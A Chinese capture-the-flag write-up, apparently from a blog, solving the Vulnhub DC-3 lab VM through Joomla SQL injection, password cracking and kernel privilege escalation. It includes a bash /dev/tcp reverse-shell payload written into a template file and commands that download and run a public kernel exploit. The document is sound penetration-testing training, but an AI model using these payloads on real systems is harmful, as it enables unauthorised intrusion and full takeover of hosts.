[Vulnhub] DC-3靶机渗透

0x00 环境搭建

靶机地址：http://www.vulnhub.com/entry/dc-32,312/
下载之后用vmware打开即可，使用桥接模式。
开机后搭建完成：

该靶场只有一个flag。

---

0x01 主机端口探测

用arp-scan -l 探测内网存活主机，再用nmap -sV -p- ip来探测端口：

发现只开启了80端口（HTTP服务）

---

0x02 web渗透

访问80端口，发现是一个 Joomla 搭建的站：

目录扫描，真正有用的目录不多：

从 README.txt 中获得 Joomla 版本号：

查找 Joomla3.7.0 已知漏洞，发现有sql注入和XSS：

查看该漏洞信息：

sqlmap拿到账户密码：

用 john 破解密码：

拿到账户名密码后登录管理后台：

接下来就是想办法拿shell了

---

0x03 文件上传getshell

找到后台上传点：

直接上传php马发现上传不了，选择直接修改已有文件：
构造payload：system("bash -c 'bash -i &> /dev/tcp/192.168.43.84/4444 0>&1'");写入文件

本地开启监听，访问该文件http://192.168.43.102/templates/beez3/error.php获得反弹shell：

---

0x04 内核提权

查看内核版本：

查找Ubuntu 16.04漏洞：

尝试后39772成功，找到并查看这个文件：

将文件下载到靶机上，然后解压并允许：

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
tar -xvf exploit.tar
./doubleput

在根目录下找到flag：

---

总结

整体流程如下：
主机发现 => 端口扫描 => 访问web服务 => 判断cms => 敏感信息泄露找到版本号 => 查找已知漏洞 => sql注入拿后台账户密码 => john破解密文 => 后台文件上传getshell => 内核漏洞提权 => 找到最终flag

与之前的靶场不一样的地方就是只有一个flag，少了中间的提示，充分体现到信息收集的重要性，要充分利用kali自带模块辅助渗透，复习了利用内核漏洞提权的流程。

---

参考链接：
https://www.cnblogs.com/chalan630/p/13363670.html（VulnHub::DC-3）